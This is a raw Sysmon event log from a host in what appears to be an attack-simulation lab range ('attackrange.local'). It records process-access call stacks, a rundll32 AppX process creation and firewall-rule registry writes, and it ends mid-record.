10341000x800000000000000010535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-93FB-6005-FE04-00000000A301}51082300C:\Windows\system32\svchost.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+21b54|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+2a21d|c:\windows\system32\appxdeploymentserver.dll+157ebf|c:\windows\system32\appxdeploymentserver.dll+ae504|c:\windows\system32\appxdeploymentserver.dll+92924|c:\windows\system32\appxdeploymentserver.dll+19e0c|c:\windows\system32\appxdeploymentserver.dll+2bffd|c:\windows\system32\appxdeploymentserver.dll+2bdf9|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.292{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefreshC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx 13241300x800000000000000010521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|B=C:\Windows\system32\wwahost.exe|M=microsoft.windows.cloudexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{9AD33F43-BA68-46BA-B70D-4281E9ED227C}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{E10A9EBF-1EBD-4015-B448-24B4DAB8DBC1}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{16EED538-872F-4095-A476-E0935BDCD55A}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{22D25978-1F54-43FA-9308-9F5DC73F4341}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x800000000000000010516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{31633854-80F2-42A2-A914-3212D971AD69}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x800000000000000010515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A63EDDD3-1CC2-49BF-A9CD-1BE8C596C4A7}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{0795F422-C17F-4A1F-9A3F-3DB3A506F619}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B50E02F0-DC39-4A5A-8B38-27C6129676EE}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D8C35944-E495-45B3-AB42-022BFDCE5B56}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 10341000x800000000000000010511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 